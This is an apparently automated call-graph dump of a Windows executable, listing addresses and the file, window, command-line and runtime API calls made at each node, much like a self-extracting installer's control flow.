SetFileAttributesW 10076->10077 10090 140003ac7 10076->10090 10078 140003b99 ??3@YAXPEAX 10077->10078 10079 140003b7d RemoveDirectoryW 10077->10079 10082 140003ba3 10078->10082 10079->10078 10081 140003b8a ??3@YAXPEAX 10079->10081 10081->10082 10082->10069 10083 140001548 2 API calls 10083->10090 10084 140002d94 2 API calls 10084->10090 10085 140003b33 SetFileAttributesW 10085->10078 10089 140003b42 DeleteFileW 10085->10089 10086 140003afd lstrcmpW 10087 140003b13 lstrcmpW 10086->10087 10088 140003b4f FindNextFileW 10086->10088 10087->10088 10087->10090 10088->10090 10091 140003b65 FindClose 10088->10091 10089->10090 10090->10078 10090->10083 10090->10084 10090->10085 10090->10086 10090->10088 10092 140003a74 2 API calls 10090->10092 10093 1400013d4 10090->10093 10091->10077 10092->10090 10094 1400013fb 10093->10094 10095 140001190 2 API calls 10094->10095 10096 140001412 10095->10096 10096->10090 10097 14001fd00 10100 140001120 AddVectoredExceptionHandler 10097->10100 10099 14001fd10 10100->10099 10360 140018e0d 10372 14001889a 10360->10372 10361 1400188b2 10394 1400182c8 10361->10394 10362 140018902 10366 1400182c8 ??3@YAXPEAX 10362->10366 10363 14001894b ??2@YAPEAX_K 10363->10372 10368 14001891d 10366->10368 10370 140014fb0 _RunAllParam ??3@YAXPEAX 10368->10370 10377 1400188e6 10370->10377 10371 140018a0f 10373 1400182c8 ??3@YAXPEAX 10371->10373 10372->10361 10372->10362 10372->10363 10372->10371 10378 140018c18 10372->10378 10379 140018b83 10372->10379 10380 140018c92 10372->10380 10384 140018d0e 10372->10384 10406 140018f74 ??2@YAPEAX_K 10372->10406 10408 1400173e4 10372->10408 10374 140018a38 10373->10374 10376 140014fb0 _RunAllParam ??3@YAXPEAX 10374->10376 10376->10377 10386 1400182c8 ??3@YAXPEAX 10378->10386 10383 1400182c8 ??3@YAXPEAX 10379->10383 10381 1400182c8 ??3@YAXPEAX 10380->10381 10382 140018cbb 10381->10382 10389 140014fb0 _RunAllParam ??3@YAXPEAX 10382->10389 10385 140018bac 10383->10385 10388 1400182c8 ??3@YAXPEAX 10384->10388 10391 140014fb0 _RunAllParam ??3@YAXPEAX 10385->10391 10387 140018c41 10386->10387 10392 140014fb0 _RunAllParam ??3@YAXPEAX 10387->10392 10390 140018d37 10388->10390 10389->10377 10393 140014fb0 _RunAllParam ??3@YAXPEAX 10390->10393 10391->10377 10392->10377 10393->10377 10395 1400182eb 10394->10395 10396 140014fb0 _RunAllParam ??3@YAXPEAX 10395->10396 10397 1400182f7 10396->10397 10398 140014fb0 _RunAllParam ??3@YAXPEAX 10397->10398 10399 140018315 10398->10399 10400 140014fb0 _RunAllParam ??3@YAXPEAX 10399->10400 10401 14001831e 10400->10401 10402 140014fb0 _RunAllParam ??3@YAXPEAX 10401->10402 10403 140018327 10402->10403 10404 140014fb0 _RunAllParam ??3@YAXPEAX 10403->10404 10405 140018330 10404->10405 10407 140018fc1 10406->10407 10407->10372 10524 14001aa80 10408->10524 10411 140017429 10411->10372 10413 1400175b2 10547 140016ddc 10413->10547 10415 1400174cb ??2@YAPEAX_K 10422 140017492 10415->10422 10416 1400174fe ??2@YAPEAX_K 10416->10422 10417 140017dc8 10419 140017e07 _CxxThrowException 10417->10419 10424 140017f7c 10417->10424 10418 1400177ef ??2@YAPEAX_K 10423 1400177fe 10418->10423 10421 140017e21 10419->10421 10420 1400176b8 10420->10418 10420->10423 10476 140017a0d 10420->10476 10429 140014fb0 _RunAllParam ??3@YAXPEAX 10421->10429 10422->10413 10422->10415 10422->10416 10543 14001dacc ??2@YAPEAX_K 10422->10543 10428 140017873 10423->10428 10495 1400178d2 10423->10495 10433 140014fb0 _RunAllParam ??3@YAXPEAX 10424->10433 10506 140017c7b 10424->10506 10426 140017e97 10443 140014fb0 _RunAllParam ??3@YAXPEAX 10426->10443 10427 140014dd8 6 API calls 10427->10476 10432 140014fb0 _RunAllParam ??3@YAXPEAX 10428->10432 10431 140017e39 10429->10431 10430 1400179dc 10564 140017218 10430->10564 10435 140014fb0 _RunAllParam ??3@YAXPEAX 10431->10435 10437 140017880 10432->10437 10438 140017fa8 10433->10438 10441 140017e46 10435->10441 10442 140014fb0 _RunAllParam ??3@YAXPEAX 10437->10442 10445 140014fb0 _RunAllParam ??3@YAXPEAX 10438->10445 10439 1400179ed 10574 14001dba4 10439->10574 10446 140014fb0 _RunAllParam ??3@YAXPEAX 10441->10446 10447 14001788d 10442->10447 10444 140017ea7 10443->10444 10448 140014fb0 _RunAllParam ??3@YAXPEAX 10444->10448 10449 140017fb5 10445->10449 10451 140017e53 10446->10451 10452 140014fb0 _RunAllParam ??3@YAXPEAX 10447->10452 10453 140017eb4 10448->10453 10454 140014fb0 _RunAllParam ??3@YAXPEAX 10449->10454 10450 140017c8b 10467 140014fb0 _RunAllParam ??3@YAXPEAX 10450->10467 10456 140014fb0 _RunAllParam ??3@YAXPEAX 10451->10456 10458 14001789a 10452->10458 10459 140014fb0 _RunAllParam ??3@YAXPEAX 10453->10459 10460 140017fc2 10454->10460 10462 140017e60 10456->10462 10463 140014fb0 _RunAllParam ??3@YAXPEAX 10458->10463 10466 140017ec1 10459->10466 10468 140014fb0 _RunAllParam ??3@YAXPEAX 10460->10468 10461 140017bff 10475 140014fb0 _RunAllParam ??3@YAXPEAX 10461->10475 10469 140014fb0 _RunAllParam ??3@YAXPEAX 10462->10469 10465 1400178a7 10463->10465 10464 140014fb0 ??3@YAXPEAX _RunAllParam 10464->10476 10470 140014fb0 _RunAllParam ??3@YAXPEAX 10465->10470 10471 140014fb0 _RunAllParam ??3@YAXPEAX 10466->10471 10472 140017cb8 10467->10472 10473 140017fcf 10468->10473 10477 140017e6d DeleteCriticalSection 10469->10477 10478 1400178b4 DeleteCriticalSection 10470->10478 10479 140017ece 10471->10479 10480 140014fb0 _RunAllParam ??3@YAXPEAX 10472->10480 10481 140014fb0 _RunAllParam ??3@YAXPEAX 10473->10481 10474 140014f08 6 API calls 10474->10476 10482 140017c2c 10475->10482 10476->10417 10476->10421 10476->10426 10476->10427 10476->10464 10476->10474 10489 140017ef9 10476->10489 10477->10506 10478->10506 10483 140014fb0 _RunAllParam ??3@YAXPEAX 10479->10483 10484 140017cc5 10480->10484 10485 140017fdc DeleteCriticalSection 10481->10485 10486 140014fb0 _RunAllParam ??3@YAXPEAX 10482->10486 10490 140017edb DeleteCriticalSection 10483->10490 10491 140014fb0 _RunAllParam ??3@YAXPEAX 10484->10491 10485->10506 10494 140017c39 10486->10494 10488 14001dacc 7 API calls 10488->10495 10492 140014fb0 _RunAllParam ??3@YAXPEAX 10489->10492 10490->10489 10496 140017cd2 10491->10496 10497 140017f06 10492->10497 10498 140014fb0 _RunAllParam ??3@YAXPEAX 10494->10498 10495->10430 10495->10450 10495->10461 10495->10488 10555 140015154 10495->10555 10558 14001eb20 10495->10558 10561 14001eb74 10495->10561 10499 140014fb0 _RunAllParam ??3@YAXPEAX 10496->10499 10500 140014fb0 _RunAllParam ??3@YAXPEAX 10497->10500 10502 140017c46 10498->10502 10503 140017cdf 10499->10503 10504 140017f10 10500->10504 10501 140014fb0 ??3@YAXPEAX _RunAllParam 10501->10506 10505 140014fb0 _RunAllParam ??3@YAXPEAX 10502->10505 10507 140014fb0 _RunAllParam ??3@YAXPEAX 10503->10507 10508 140014fb0 _RunAllParam ??3@YAXPEAX 10504->10508 10509 140017c53 10505->10509 10506->10501 10510 140014fb0 _RunAllParam ??3@YAXPEAX 10506->10510 10579 140014dd8 10506->10579 10590 140014f08 10506->10590 10511 140017cec DeleteCriticalSection 10507->10511 10512 140017f1d 10508->10512 10513 140014fb0 _RunAllParam ??3@YAXPEAX 10509->10513 10514 140018176 DeleteCriticalSection 10510->10514 10511->10506 10515 140014fb0 _RunAllParam ??3@YAXPEAX 10512->10515 10516 140017c60 DeleteCriticalSection 10513->10516 10514->10506 10517 140017f2a 10515->10517 10516->10506 10518 140014fb0 _RunAllParam ??3@YAXPEAX 10517->10518 10519 140017f37 10518->10519 10520 140014fb0 _RunAllParam ??3@YAXPEAX 10519->10520 10521 140017f44 10520->10521 10522 140014fb0 _RunAllParam ??3@YAXPEAX 10521->10522 10523 140017f51 DeleteCriticalSection 10522->10523 10523->10506 10525 14001aaad 10524->10525 10541 140017421 10524->10541 10525->10541 10594 14001a724 10525->10594 10528 14001a724 6 API calls 10533 14001ab7c 10528->10533 10529 14001ad34 10530 140014fb0 _RunAllParam ??3@YAXPEAX 10529->10530 10530->10541 10531 14001abbe 10532 140014fb0 _RunAllParam ??3@YAXPEAX 10531->10532 10534 14001abc8 memset 10532->10534 10533->10529 10533->10531 10535 14001ac99 10534->10535 10537 14001ac24 10534->10537 10536 140014fb0 _RunAllParam ??3@YAXPEAX 10535->10536 10538 14001acdb 10536->10538 10537->10535 10539 140014f08 6 API calls 10537->10539 10540 140014fb0 _RunAllParam ??3@YAXPEAX 10538->10540 10539->10537 10540->10541 10541->10411 10542 140009bac InitializeCriticalSection 10541->10542 10542->10422 10544 14001daf3 10543->10544 10545 140014f08 6 API calls 10544->10545 10546 14001db10 10545->10546 10546->10422 10548 140016dfe 10547->10548 10550 140014f08 6 API calls 10548->10550 10554 140016e75 10548->10554 10549 140016f8d 10549->10420 10550->10548 10551 140014f08 6 API calls 10553 140016f56 10551->10553 10552 140014f08 6 API calls 10552->10554 10553->10549 10553->10551 10554->10552 10554->10553 10600 140014fe0 10555->10600 10611 14001ea90 10558->10611 10562 14001ea90 13 API calls 10561->10562 10563 14001eb89 10562->10563 10563->10495 10565 140017232 10564->10565 10709 140016a14 10565->10709 10567 14001723d 10568 140016a14 6 API calls 10567->10568 10569 140017253 10568->10569 10714 140016c5c 10569->10714 10571 140017269 10572 140016c5c 6 API calls 10571->10572 10573 14001727f 10572->10573 10573->10439 10575 140014dd8 6 API calls 10574->10575 10576 14001dbd2 10575->10576 10577 14001dc05 10576->10577 10578 140014f08 6 API calls 10576->10578 10577->10476 10578->10576 10580 140014ea4 10579->10580 10581 140014df6 10579->10581 10580->10506 10582 140014e16 10581->10582 10583 140014dfe _CxxThrowException 10581->10583 10584 140014e46 10582->10584 10585 140014e2c _CxxThrowException 10582->10585 10583->10582 10586 140014e94 ??3@YAXPEAX 10584->10586 10587 140014e4d ??2@YAPEAX_K 10584->10587 10585->10584 10586->10580 10588 140014e77 memcpy 10587->10588 10589 140014e5d _CxxThrowException 10587->10589 10588->10586 10589->10588 10591 140014f14 10590->10591 10592 140014f39 10590->10592 10593 140014dd8 6 API calls 10591->10593 10592->10506 10593->10592 10595 14001a738 10594->10595 10596 140014dd8 6 API calls 10595->10596 10599 14001a742 10596->10599 10597 14001a765 10597->10528 10597->10529 10598 140014f08 6 API calls 10598->10599 10599->10597 10599->10598 10602 140015014 10600->10602 10601 1400150ce ??2@YAPEAX_K 10603 1400150dd 10601->10603 10605 1400150e5 10601->10605 10602->10601 10602->10605 10606 140015ca0 10603->10606 10605->10495 10607 140002ccc 61 API calls 10606->10607 10608 140015d64 10607->10608 10609 140015d87 10608->10609 10610 140015d6d _CxxThrowException 10608->10610 10609->10605 10610->10609 10621 14001e588 10611->10621 10614 14001eadb 10617 140014f08 6 API calls 10614->10617 10615 14001eace 10632 14001e908 10615->10632 10618 14001eaea 10617->10618 10643 140016cdc 10618->10643 10670 14001d9ec 10621->10670 10624 140014dd8 6 API calls 10625 14001e66d 10624->10625 10626 140014dd8 6 API calls 10625->10626 10627 14001e67c 10626->10627 10628 140014dd8 6 API calls 10627->10628 10629 14001e68b 10628->10629 10630 140014dd8 6 API calls 10629->10630 10631 14001e69a ??2@YAPEAX_K 10630->10631 10631->10614 10631->10615 10679 14001e7d0 10632->10679 10637 14001e6bc 7 API calls 10638 14001e9e0 10637->10638 10639 14001dba4 6 API calls 10638->10639 10640 14001ea29 10639->10640 10641 14001dba4 6 API calls 10640->10641 10642 14001ea72 10641->10642 10642->10614 10695 1400169d8 10643->10695 10646 140014fb0 _RunAllParam ??3@YAXPEAX 10647 140016d04 10646->10647 10648 140014fb0 _RunAllParam ??3@YAXPEAX 10647->10648 10649 140016d10 10648->10649 10650 140014fb0 _RunAllParam ??3@YAXPEAX 10649->10650 10651 140016d36 10650->10651 10652 140014fb0 _RunAllParam ??3@YAXPEAX 10651->10652 10653 140016d5c 10652->10653 10654 1400169d8 4 API calls 10653->10654 10655 140016d6e 10654->10655 10703 140009a88 10655->10703 10658 140009a88 2 API calls 10659 140016d80 10658->10659 10660 140009a88 2 API calls 10659->10660 10661 140016d89 10660->10661 10662 140014fb0 _RunAllParam ??3@YAXPEAX 10661->10662 10663 140016d95 10662->10663 10664 140014fb0 _RunAllParam ??3@YAXPEAX 10663->10664 10665 140016da1 10664->10665 10666 140014fb0 _RunAllParam ??3@YAXPEAX 10665->10666 10667 140016daa 10666->10667 10668 140014fb0 _RunAllParam ??3@YAXPEAX 10667->10668 10669 140016db3 10668->10669 10669->10495 10671 140014dd8 6 API calls 10670->10671 10672 14001da8d 10671->10672 10673 140014dd8 6 API calls 10672->10673 10674 14001da99 10673->10674 10675 140014dd8 6 API calls 10674->10675 10676 14001daa5 10675->10676 10677 140014dd8 6 API calls 10676->10677 10678 14001dab1 10677->10678 10678->10624 10680 14001e7fc 10679->10680 10681 14001dba4 6 API calls 10680->10681 10682 14001e858 10681->10682 10683 14001dba4 6 API calls 10682->10683 10684 14001e882 10683->10684 10685 14001dba4 6 API calls 10684->10685 10686 14001e8b3 10685->10686 10687 14001dba4 6 API calls 10686->10687 10688 14001e8e9 10687->10688 10689 14001e6bc 10688->10689 10690 14001e6db 10689->10690 10691 140014dd8 6 API calls 10690->10691 10692 14001e6ed 10691->10692 10693 14001e70d 10692->10693 10694 14001dacc 7 API calls 10692->10694 10693->10637 10694->10692 10696 1400169f4 10695->10696 10697 1400169ef 10695->10697 10699 140016a0b 10696->10699 10708 140009ac4 WaitForSingleObject 10696->10708 10707 140009b40 SetEvent 10697->10707 10699->10646 10704 140009ab7 10703->10704 10705 140009a99 CloseHandle 10703->10705 10704->10658 10705->10704 10706 140009aa3 GetLastError 10705->10706 10706->10704 10710 140014dd8 6 API calls 10709->10710 10711 140016a42 10710->10711 10712 140016a75 10711->10712 10713 140014f08 6 API calls 10711->10713 10712->10567 10713->10711 10715 140014dd8 6 API calls 10714->10715 10716 140016c8a 10715->10716 10717 140016cbc 10716->10717 10718 140014f08 6 API calls 10716->10718 10717->10571 10718->10716 9541 140014a2c ReadFile 10857 14000ae48 10866 14000a754 10857->10866 10860 1400021cc 4 API calls 10861 14000ae72 10860->10861 10877 14000a0b8 GetDlgItem SetWindowPos 10861->10877 10863 14000aeb1 10864 14000ad10 27 API calls 10863->10864 10865 14000aeb9 10864->10865 10878 14000a118 GetDlgItem GetWindowLongPtrW 10866->10878 10868 14000a762 GetDlgItem 10869 1400021cc 4 API calls 10868->10869 10870 14000a77e GetDlgItem 10869->10870 10871 1400021cc 4 API calls 10870->10871 10872 14000a79a GetClientRect 10871->10872 10905 14000a0b8 GetDlgItem SetWindowPos 10872->10905 10874 14000a810 10906 14000a0b8 GetDlgItem SetWindowPos 10874->10906 10876 14000a848 GetDlgItem 10876->10860 10877->10863 10879 14000a18a GetDlgItem GetWindowLongPtrW 10878->10879 10880 14000a170 GetDlgItem 10878->10880 10883 14000a1d5 GetDlgItem 10879->10883 10885 14000a1ef GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics GetParent 10879->10885 10881 1400021cc 4 API calls 10880->10881 10881->10879 10884 1400021cc 4 API calls 10883->10884 10884->10885 10887 14000a322 SetWindowPos 10885->10887 10888 14000a2b3 GetClientRect ClientToScreen ClientToScreen 10885->10888 10890 14000a359 10887->10890 10896 14000a394 10887->10896 10889 14000a2f4 10888->10889 10889->10887 10908 14000a0b8 GetDlgItem SetWindowPos 10890->10908 10893 14000a37b GetDlgItem 10895 1400021cc 4 API calls 10893->10895 10894 14000a40d 10897 14000a4da GetSystemMetrics GetSystemMetrics 10894->10897 10898 14000a41c GetClientRect 10894->10898 10895->10896 10907 14000a0b8 GetDlgItem SetWindowPos 10896->10907 10897->10868 10899 14000a484 10898->10899 10900 14000a42f 10898->10900 10910 14000a0b8 GetDlgItem SetWindowPos 10899->10910 10900->10899 10909 14000a0b8 GetDlgItem SetWindowPos 10900->10909 10903 14000a46b GetDlgItem 10904 1400021cc 4 API calls 10903->10904 10904->10899 10905->10874 10906->10876 10907->10894 10908->10893 10909->10903 10910->10897 10911 14000aa4c 10912 14000a118 26 API calls 10911->10912 10913 14000aa63 10912->10913 10914 14000aa81 GetDlgItem 10913->10914 10915 14000aa70 GetClientRect 10913->10915 10917 1400021cc 4 API calls 10914->10917 10916 14000aa9d GetClientRect 10915->10916 10919 14000aaed GetDlgItem 10916->10919 10920 14000aabf 10916->10920 10918 14000aa99 10917->10918 10918->10916 10922 1400021cc 4 API calls 10919->10922 10927 14000a0b8 GetDlgItem SetWindowPos 10920->10927 10924 14000ab09 10922->10924 10923 14000aaea 10923->10919 10928 14000a0b8 GetDlgItem SetWindowPos 10924->10928 10926 14000ab3d 10927->10923 10928->10926 9542 14001f68c GetStartupInfoW 9543 14001f6bf 9542->9543 9544 14001f6d1 9543->9544 9545 14001f6d8 Sleep 9543->9545 9546 14001f6f0 _amsg_exit 9544->9546 9548 14001f6fa 9544->9548 9545->9543 9546->9548 9547 14001f76a _initterm 9549 14001f787 9547->9549 9548->9547 9548->9549 9556 14001f74b 9548->9556 9550 14001f85a _ismbblead 9549->9550 9551 14001f7de 9549->9551 9549->9556 9550->9549 9558 1400099fc 9551->9558 9554 14001f831 9554->9556 9557 14001f83a _cexit 9554->9557 9555 14001f829 exit 9555->9554 9557->9556 9561 140007830 ?_set_new_handler@@YAP6AH_K@ZP6AH0@Z 9558->9561 9874 140002118 GetModuleHandleW CreateWindowExW 9561->9874 9564 140007884 9565 1400099b9 MessageBoxA 9564->9565 9567 1400078a0 9564->9567 9566 1400099da 9565->9566 9566->9554 9566->9555 9877 140001190 9567->9877 9570 140001190 2 API calls 9571 14000792f 9570->9571 9572 140001190 2 API calls 9571->9572 9573 140007988 GetCommandLineW 9572->9573 9882 140006618 9573->9882 9579 1400079dc 9580 140005bb0 lstrlenW lstrlenW CharUpperW 9579->9580 9581 1400079f7 9580->9581 9582 140007a02 _wtol 9581->9582 9584 140007a29 9581->9584 9582->9584 9583 140006368 33 API calls 9585 140007a4c 9583->9585 9584->9583 9586 140005bb0 lstrlenW lstrlenW CharUpperW 9585->9586 9587 140007a5b 9586->9587 9588 140007a6a 9587->9588 9589 140007a60 9587->9589 9591 140005bb0 lstrlenW lstrlenW CharUpperW 9588->9591 9590 140006b60 58 API calls 9589->9590 9657 140007a65 9590->9657 9592 140007a79 9591->9592 9594 140007a8d 9592->9594 9595 140007a7e 9592->9595 9593 1400096d3 ??3@YAXPEAX 9596 1400096fc 9593->9596 9598 140005bb0 lstrlenW lstrlenW CharUpperW 9594->9598 9597 1400071c4 10 API calls 9595->9597 9599 140014fb0 _RunAllParam ??3@YAXPEAX 9596->9599 9597->9657 9605 140007a9f 9598->9605 9601 140009709 ??3@YAXPEAX ??3@YAXPEAX 9599->9601 9600 140007adb GetModuleFileNameW 9603 140007af1 9600->9603 9604 140007b07 9600->9604 9601->9566 9602 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9602->9600 9606 14000c7f4 70 API calls 9603->9606 9607 140005bb0 lstrlenW lstrlenW CharUpperW 9604->9607 9605->9600 9605->9602 9606->9657 9622 140007b40 9607->9622 9608 140007d2c 9609 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9608->9609 9610 140007d7c 9608->9610 9609->9610 9611 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9610->9611 9612 140007ddb 9610->9612 9611->9612 9615 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9612->9615 9641 140007f0d 9612->9641 9613 140007c1e 9614 140007c52 9613->9614 9619 140007c3b _wtol 9613->9619 9613->9657 9617 140005bb0 lstrlenW lstrlenW CharUpperW 9614->9617 9618 140007e41 9615->9618 9616 140002a18 LoadLibraryA GetProcAddress GetNativeSystemInfo 9620 140007f2e 9616->9620 9627 140007cbb 9617->9627 9623 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9618->9623 9619->9614 9621 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9620->9621 9624 140007f3d ??2@YAPEAX_K 9621->9624 9622->9608 9622->9613 9622->9614 9626 140001548 ??2@YAPEAX_K ??3@YAXPEAX 9622->9626 9622->9657 9631 140007e5c 9623->9631 9625 140007f4d 9624->9625 9634 140014a00 CloseHandle CreateFileW 9625->9634 9626->9622 9627->9608 9628 140006618 ??2@YAPEAX_K ??3@YAXPEAX 9627->9628 9632 140007cff 9628->9632 9629 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9633 140007eca 9629->9633 9630 1400027a0 18 API calls 9635 140007f02 9630->9635 9631->9629 9631->9633 9632->9608 9638 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9632->9638 9633->9630 9636 140007f95 9634->9636 9637 140002d94 ??2@YAPEAX_K ??3@YAXPEAX 9635->9637 9639 140007fc6 9636->9639 9640 140007f9a 9636->9640 9637->9641 9638->9608 9642 140002b70 ??2@YAPEAX_K ??3@YAXPEAX 9639->9642 9643 14000c7f4 70 API calls 9640->9643 9641->9616 9644 140007fe4 9642->9644 9643->9657 9645 140005074 19 API calls 9644->9645 9646 140007ff1 9645->9646 9647 140007ff6 9646->9647 9648 14000801f 9646->9648 9649 14000c7f4 70 API calls 9647->9649 9651 140005bb0 lstrlenW lstrlenW CharUpperW 9648->9651 9654 1400080cc 9648->9654 9650 140008000 ??3@YAXPEAX 9649->9650 9650->9657 9652 14000803a 9651->9652 9652->9654 9661 140008043 9652->9661 9653 1400080f9 9656 1400080ab ??3@YAXPEAX 9653->9656 9659 140008115 wsprintfW 9653->9659 9660 14000821d 9653->9660 9654->9653 9655 140004188 107 API calls 9654->9655 9658 1400080f4 9655->9658 9656->9593 9656->9657 9657->9593 9658->9653 9662 140008089 ??3@YAXPEAX 9658->9662 9663 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9659->9663 9664 1400066a8 24 API calls 9660->9664 9661->9656 9665 14000746c 109 API calls 9661->9665 9662->9657 9670 140008155 9663->9670 9744 14000822a 9664->9744 9667 140008078 9665->9667 9666 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9666->9670 9667->9656 9669 14000807d 9667->9669 9668 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9668->9670 9671 14000c7f4 70 API calls 9669->9671 9670->9666 9670->9668 9672 1400027a0 18 API calls 9670->9672 9674 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9670->9674 9671->9662 9672->9670 9673 1400084f4 9675 1400066a8 24 API calls 9673->9675 9676 1400081a9 ??2@YAPEAX_K 9674->9676 9677 140008505 9675->9677 9680 1400081b6 9676->9680 9678 14000871a 9677->9678 9682 140002a50 AllocateAndInitializeSid CheckTokenMembership FreeSid 9677->9682 9681 140003a58 lstrcmpW 9678->9681 9679 140003008 ??2@YAPEAX_K ??3@YAXPEAX 9679->9680 9680->9679 9683 140014f08 6 API calls 9680->9683 9724 14000873d 9681->9724 9684 140008520 9682->9684 9685 1400081da ??3@YAXPEAX ??3@YAXPEAX 9683->9685 9684->9678 9688 140008528 9684->9688 9685->9659 9685->9660 9686 1400088d7 9690 140005e64 17 API calls 9686->9690 9687 140002d28 ??2@YAPEAX_K ??3@YAXPEAX 9687->9724 9689 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9688->9689 9692 140008546 9689->9692 9693 1400088f6 9690->9693 9691 140006998 114 API calls 9691->9744 9694 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9692->9694 9695 140008915 9693->9695 9696 14000899b CoInitialize 9693->9696 9699 14000856b GetCommandLineW 9694->9699 9700 140003a58 lstrcmpW 9695->9700 9703 140003a58 lstrcmpW 9696->9703 9697 1400088de ??3@YAXPEAX 9697->9686 9701 140006618 ??2@YAPEAX_K ??3@YAXPEAX 9699->9701 9702 14000892c 9700->9702 9704 14000857e 9701->9704 9705 14000893e 9702->9705 9709 1400027a0 18 API calls 9702->9709 9706 1400089d0 9703->9706 9708 140002d28 ??2@YAPEAX_K ??3@YAXPEAX 9704->9708 9710 14000aec0 ??2@YAPEAX_K ??3@YAXPEAX GetSystemMetrics GetSystemMetrics 9705->9710 9707 1400089e7 9706->9707 9711 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9706->9711 9712 140005908 12 API calls 9707->9712 9713 14000858e 9708->9713 9709->9705 9714 14000894e 9710->9714 9711->9707 9715 1400089ef 9712->9715 9716 14000622c ??2@YAPEAX_K ??3@YAXPEAX 9713->9716 9717 14000af54 36 API calls 9714->9717 9719 140003a58 lstrcmpW 9715->9719 9720 1400085a4 9716->9720 9721 140008989 _RunAllParam 9717->9721 9718 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9718->9724 9722 140008a06 9719->9722 9723 140006290 ??2@YAPEAX_K ??3@YAXPEAX 9720->9723 9721->9656 9725 140008a1a 9722->9725 9726 140008a0b _wtol 9722->9726 9727 1400085bb 9723->9727 9724->9686 9724->9687 9724->9697 9724->9718 9724->9724 9731 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9724->9731 9729 140008a52 9725->9729 9730 140008a22 9725->9730 9726->9725 9728 140006290 ??2@YAPEAX_K ??3@YAXPEAX 9727->9728 9733 1400085cf 9728->9733 9732 140008a5b 9729->9732 9793 140008a6a 9729->9793 9734 14000ca24 77 API calls 9730->9734 9735 140008833 ??2@YAPEAX_K 9731->9735 9736 14000c938 GetStdHandle WriteFile lstrcmpW 9732->9736 9737 1400062fc ??2@YAPEAX_K ??3@YAXPEAX 9733->9737 9738 140008a2f ??3@YAXPEAX 9734->9738 9741 140008842 9735->9741 9740 140008a68 9736->9740 9742 1400085e0 9737->9742 9738->9657 9739 140003008 ??2@YAPEAX_K ??3@YAXPEAX 9739->9741 9740->9738 9741->9739 9743 140014f08 6 API calls 9741->9743 9745 1400015d4 ??2@YAPEAX_K ??3@YAXPEAX 9742->9745 9746 140008866 ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX 9743->9746 9744->9673 9744->9691 9747 140005978 lstrlenW lstrlenW _wcsnicmp 9744->9747 9752 140008425 _wtol 9744->9752 9771 140005f20 114 API calls 9744->9771 9780 1400084d5 ??3@YAXPEAX 9744->9780 9749 1400085f8 9745->9749 9750 140003a58 lstrcmpW 9746->9750 9747->9744 9748 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9748->9793 9754 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9749->9754 9755 14000862a 7 API calls 9749->9755 9750->9724 9751 14000b9d4 39 API calls 9751->9793 9752->9744 9754->9755 9756 140006c88 8 API calls 9755->9756 9761 1400086b9 9756->9761 9757 140008aa2 GetKeyState 9757->9793 9758 140008c5a ??3@YAXPEAX 9758->9657 9759 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9759->9793 9760 140003a58 lstrcmpW 9760->9793 9765 1400086c5 ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX 9761->9765 9766 1400086fe ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX 9761->9766 9762 140008cbc 9763 140008cc6 9762->9763 9764 140008d3d 9762->9764 9767 140005d28 6 API calls 9763->9767 9768 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9764->9768 9765->9657 9766->9656 9770 140008cda 9767->9770 9772 140008d54 9768->9772 9769 14000bab8 39 API calls 9769->9793 9773 140008d24 ??3@YAXPEAX 9770->9773 9774 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9770->9774 9771->9744 9775 140005908 12 API calls 9772->9775 9784 140008de9 9773->9784 9779 140008cfd 9774->9779 9781 140008d88 9775->9781 9776 140008cb5 ??3@YAXPEAX 9776->9758 9777 140008c4a ??3@YAXPEAX 9777->9793 9778 140008c7c 9782 14000c7f4 70 API calls 9778->9782 9779->9773 9780->9657 9783 140008dd4 ??3@YAXPEAX 9781->9783 9786 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9781->9786 9785 140008c8b ??3@YAXPEAX ??3@YAXPEAX 9782->9785 9783->9784 9787 140008e38 9784->9787 9788 140008e2b 9784->9788 9785->9657 9790 140008daa 9786->9790 9789 14000bb50 39 API calls 9787->9789 9791 1400018f4 106 API calls 9788->9791 9792 140008e36 9789->9792 9790->9783 9791->9792 9795 140008e8b 9792->9795 9796 140008e4a 9792->9796 9793->9748 9793->9751 9793->9757 9793->9758 9793->9759 9793->9760 9793->9762 9793->9769 9793->9776 9793->9777 9793->9778 9794 140001548 ??2@YAPEAX_K ??3@YAXPEAX 9793->9794 9794->9793 9797 140005e64 17 API calls 9795->9797 9798 140008e53 9796->9798 9799 140008e5f ??3@YAXPEAX ??3@YAXPEAX 9796->9799 9800 140008e90 9797->9800 9801 140003bb8 16 API calls 9798->9801 9799->9657 9802 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9800->9802 9805 140008ea0 9800->9805 9801->9799 9803 140008eca 9802->9803 9806 1400065b0 16 API calls 9803->9806 9863 140008ee1 9803->9863 9804 140009899 _RunAllParam 9808 140009945 ??3@YAXPEAX ??3@YAXPEAX 9804->9808 9812 140003a58 lstrcmpW 9804->9812 9805->9804 9807 140003a58 lstrcmpW 9805->9807 9806->9863 9809 140009833 9807->9809 9810 140009965 ??3@YAXPEAX 9808->9810 9811 14000995c 9808->9811 9809->9804 9815 14000aec0 ??2@YAPEAX_K ??3@YAXPEAX GetSystemMetrics GetSystemMetrics 9809->9815 9813 14000998e 9810->9813 9811->9810 9814 1400098d4 